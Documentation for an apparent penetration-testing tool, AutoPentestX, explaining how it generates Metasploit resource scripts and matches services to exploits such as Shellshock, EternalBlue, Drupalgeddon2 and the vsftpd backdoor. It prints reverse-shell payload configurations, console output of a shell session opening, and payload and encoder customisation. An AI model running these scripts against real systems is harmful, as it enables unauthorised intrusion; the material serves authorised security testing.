Skip to main content

Overview

AutoPentestX generates Metasploit Resource (RC) scripts during the exploitation assessment phase. These scripts allow security professionals to manually validate identified vulnerabilities in controlled environments. All scripts are generated in SAFE MODE by default and require manual activation.
Safe Mode: AutoPentestX never automatically executes exploits. All exploitation is simulated, and RC scripts are provided for manual review and execution by authorized professionals only.

RC Script Location

All Metasploit resource scripts are saved to the exploits/ directory: 
exploits/
└── exploit_192.168.1.100_80_20251130_143215.rc
Naming Convention: exploit_{target}_{port}_{timestamp}.rc

RC Script Structure

Each generated script follows this format: 
# Metasploit Resource Script
# Generated by AutoPentestX
# Target: 192.168.1.100:80
# Date: 2025-11-30 14:32:15

use exploit/multi/http/apache_mod_cgi_bash_env_exec
set RHOSTS 192.168.1.100
set RPORT 80
set PAYLOAD generic/shell_reverse_tcp
set LHOST 0.0.0.0
set LPORT 4444
check
# Exploit execution disabled in safe mode
# Uncomment to execute: exploit

Script Components

# Metasploit Resource Script
# Generated by AutoPentestX
# Target: 192.168.1.100:80
# Date: 2025-11-30 14:32:15
Metadata for tracking:
  • Script purpose
  • Generator tool
  • Target information
  • Generation timestamp
use exploit/multi/http/apache_mod_cgi_bash_env_exec
Specifies the Metasploit exploit module to load based on:
  • Detected vulnerability
  • Service version
  • CVE matching
set RHOSTS 192.168.1.100  # Remote target
set RPORT 80               # Vulnerable port
Pre-configured with scan results:
  • RHOSTS: Target IP or hostname
  • RPORT: Service port number
set PAYLOAD generic/shell_reverse_tcp
set LHOST 0.0.0.0          # Your attack machine IP
set LPORT 4444              # Listening port
Default payload settings:
  • Reverse TCP shell (most compatible)
  • Placeholder LHOST (must be updated)
  • Standard port 4444
check
Non-invasive vulnerability check:
  • Verifies if target is vulnerable
  • Does not execute exploit
  • Safe for production systems
# Exploit execution disabled in safe mode
# Uncomment to execute: exploit
Manual activation required:
  • Prevents accidental execution
  • Requires explicit decision
  • Ensures authorized use only

Using RC Scripts

Loading in Metasploit Console

# Start Metasploit
msfconsole

# Load RC script
msf6 > resource exploits/exploit_192.168.1.100_80_20251130_143215.rc

# Script will load module and set options
# Review settings before proceeding
msf6 exploit(apache_mod_cgi_bash_env_exec) > show options

Checking Vulnerability

After loading the RC script: 
msf6 exploit(apache_mod_cgi_bash_env_exec) > check

[*] 192.168.1.100:80 - The target appears to be vulnerable.
Check command results:
  • The target appears to be vulnerable - Exploit likely to succeed
  • The target is not exploitable - Target not vulnerable
  • Unknown - Unable to determine (may still be vulnerable)

Configuring Payload

Update the LHOST before execution: 
# Set your attacker machine IP
msf6 exploit(apache_mod_cgi_bash_env_exec) > set LHOST 192.168.1.50

# Optionally change port
msf6 exploit(apache_mod_cgi_bash_env_exec) > set LPORT 4444

# Verify settings
msf6 exploit(apache_mod_cgi_bash_env_exec) > show options

Executing Exploit (Manual Only)

WARNING: Only execute exploits on systems you own or have explicit written authorization to test. Unauthorized exploitation is illegal.
# After verifying all settings and authorization
msf6 exploit(apache_mod_cgi_bash_env_exec) > exploit

[*] Started reverse TCP handler on 192.168.1.50:4444
[*] Command shell session 1 opened

shell>

Exploit Database

AutoPentestX includes built-in exploit mappings for common vulnerabilities:

FTP Exploits

ServiceExploit ModuleDescription
vsftpd 2.3.4exploit/unix/ftp/vsftpd_234_backdoorVSFTPD v2.3.4 Backdoor Command Execution
ProFTPD 1.3.3cexploit/unix/ftp/proftpd_133c_backdoorProFTPD 1.3.3c Backdoor

HTTP Exploits

VulnerabilityExploit ModuleDescription
Shellshockexploit/multi/http/apache_mod_cgi_bash_env_execApache mod_cgi Bash Environment Variable Injection
Drupalgeddon2exploit/unix/webapp/drupal_drupalgeddon2Drupal Remote Code Execution

SMB Exploits

CVEExploit ModuleDescriptionSafe
CVE-2017-0144exploit/windows/smb/ms17_010_eternalblueEternalBlue SMB Remote Code Execution⚠️ No*
*Potentially destructive - skipped in safe mode

Exploit Matching Logic

AutoPentestX uses two methods to match exploits:

1. Service Version Matching

Matches service banners to known vulnerable versions: 
# Example: modules/exploit_engine.py:84-92
service = "ftp"
version = "vsftpd 2.3.4"

# Matches exploit_db key "vsftpd 2.3.4"
exploit = {
    'name': 'vsftpd_234_backdoor',
    'module': 'exploit/unix/ftp/vsftpd_234_backdoor',
    'confidence': 'HIGH'
}

2. CVE-to-Exploit Mapping

Matches CVE identifiers to exploit modules: 
# Example: modules/exploit_engine.py:99-114
cve_exploits = {
    'CVE-2017-0144': 'EternalBlue',
    'CVE-2014-6271': 'Shellshock',
    'CVE-2018-7600': 'Drupalgeddon2'
}

Exploitation Output

During scan execution, the exploitation phase logs: 
[STEP 6] Exploitation Assessment (Safe Mode)...
============================================================
AutoP entestX - Exploit Matching
============================================================

[✓] Exploit matched: apache_mod_cgi_bash_env_exec for port 80

[*] Total exploits matched: 1

============================================================
AutoP entestX - Exploitation Simulation
============================================================
Safe Mode: ENABLED
Target: 192.168.1.100
============================================================

[*] Running in SAFE MODE - No actual exploitation will occur
[*] Generating exploit feasibility reports...

[*] Simulating exploit: exploit/multi/http/apache_mod_cgi_bash_env_exec
    Target: 192.168.1.100:80
    Payload: generic/shell_reverse_tcp
[✓] Metasploit RC script saved: exploits/exploit_192.168.1.100_80_20251130_143215.rc
[*] Port 80: apache_mod_cgi_bash_env_exec - SIMULATED

============================================================
EXPLOITATION SUMMARY
============================================================
Exploits matched: 1
Exploits simulated: 1
Safe mode: ENABLED
============================================================

[i] Note: All exploitation was simulated only.
[i] RC scripts generated for manual testing if needed.

Customizing RC Scripts

After generation, you can manually customize scripts:

Change Payload

# Original
set PAYLOAD generic/shell_reverse_tcp

# Meterpreter (more features)
set PAYLOAD windows/meterpreter/reverse_tcp

# Bind shell (alternative)
set PAYLOAD windows/shell/bind_tcp
set RHOST 192.168.1.100

Add Advanced Options

# Enable verbose output
set VERBOSE true

# Set timeout
set WfsDelay 30

# Configure encoder
set ENCODER x86/shikata_ga_nai

# Set target index
set TARGET 0

Multiple Attempts

# Try different payloads automatically
use exploit/multi/http/apache_mod_cgi_bash_env_exec
set RHOSTS 192.168.1.100
set RPORT 80

# Attempt 1: Generic shell
set PAYLOAD generic/shell_reverse_tcp
set LHOST 192.168.1.50
set LPORT 4444
check
# exploit

# Attempt 2: Command execution
set PAYLOAD cmd/unix/reverse
set LHOST 192.168.1.50
set LPORT 4445
check
# exploit

Safe Mode Behavior

AutoPentestX implements multiple safety layers: 
# modules/exploit_engine.py:22-52
exploit_db = {
    'Shellshock': {
        'name': 'apache_mod_cgi_bash_env_exec',
        'module': 'exploit/multi/http/apache_mod_cgi_bash_env_exec',
        'safe': True  # Safe to check
    },
    'EternalBlue': {
        'name': 'ms17_010_eternalblue',
        'module': 'exploit/windows/smb/ms17_010_eternalblue',
        'safe': False  # Potentially destructive
    }
}
Exploits marked as safe: False are automatically skipped in safe mode.
# modules/exploit_engine.py:119-154
if not self.safe_mode:
    print("[!] WARNING: Safe mode disabled")
    return {'status': 'BLOCKED'}

# Only simulate
result = {
    'status': 'SIMULATED',
    'safe_mode': True,
    'result': 'Exploit would be executed in non-safe mode'
}
Even with Metasploit available, exploits are never automatically executed.
All RC scripts include commented exploit commands:
# Exploit execution disabled in safe mode
# Uncomment to execute: exploit
This prevents accidental execution via msfconsole -r script.rc.

Exploitation Report

Generate a JSON report of all exploitation attempts: 
from modules.exploit_engine import ExploitEngine

exploit_engine = ExploitEngine(safe_mode=True)
# ... perform exploitation assessment ...
exploit_engine.generate_exploit_report('exploits/exploitation_report.json')
Output format: 
{
  "timestamp": "2025-11-30T14:32:45",
  "safe_mode": true,
  "metasploit_available": true,
  "exploitation_results": [
    {
      "port": 80,
      "exploit_name": "apache_mod_cgi_bash_env_exec",
      "status": "SIMULATED",
      "description": "Apache mod_cgi Bash Environment Variable Code Injection",
      "confidence": "HIGH",
      "rc_script": "exploits/exploit_192.168.1.100_80_20251130_143215.rc"
    }
  ],
  "summary": {
    "total_attempts": 1,
    "simulated": 1,
    "skipped": 0,
    "successful": 0
  }
}

Metasploit Detection

AutoPentestX automatically checks for Metasploit availability: 
[✓] Metasploit Framework detected
Or: 
[!] Metasploit not found - Exploitation features limited
If Metasploit is not installed, RC scripts are still generated but cannot be loaded.

Installing Metasploit

# Kali Linux (pre-installed)
msfconsole -v

# Ubuntu/Debian
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall
chmod 755 msfinstall
./msfinstall

# Verify installation
which msfconsole

Best Practices

  1. Always Review Scripts: Inspect RC scripts before loading in Metasploit
  2. Verify Authorization: Ensure written permission before exploitation
  3. Use Check Command: Run check before exploit to verify vulnerability
  4. Update LHOST: Always set your correct attacker IP address
  5. Lab Environment: Test exploits in isolated lab environments first
  6. Document Actions: Keep records of all exploitation attempts
  7. Safe Payloads: Start with non-destructive payloads (reverse shells)
  8. Backup Targets: Back up target systems before exploitation (if possible)
Legal Disclaimer: Unauthorized exploitation of computer systems is illegal in most jurisdictions. Always obtain explicit written permission before conducting penetration tests. AutoPentestX is designed for authorized security assessments only.

Troubleshooting

Cause: No exploits matched to vulnerabilitiesSolution:
  • Verify vulnerabilities were detected
  • Check if Metasploit is installed
  • Review logs for exploit matching errors
  • Manually search Metasploit for applicable exploits
Cause: Exploit flagged as potentially destructiveExample:
[!] Skipping potentially dangerous exploit: ms17_010_eternalblue
Solution:
  • Review exploit safety classification
  • Use in isolated lab environment only
  • Manually execute with extreme caution
Cause: False positive from automated detectionSolution:
# Verify manually
msf6 > check
msf6 > show options
msf6 > set VERBOSE true
msf6 > check
Cause: Firewall, incorrect LHOST, or payload mismatchSolution:
# Verify network connectivity
ping 192.168.1.100

# Check LHOST is reachable from target
# Try different payload
set PAYLOAD windows/meterpreter/bind_tcp

Build docs developers (and LLMs) love

Get started for freeTalk to us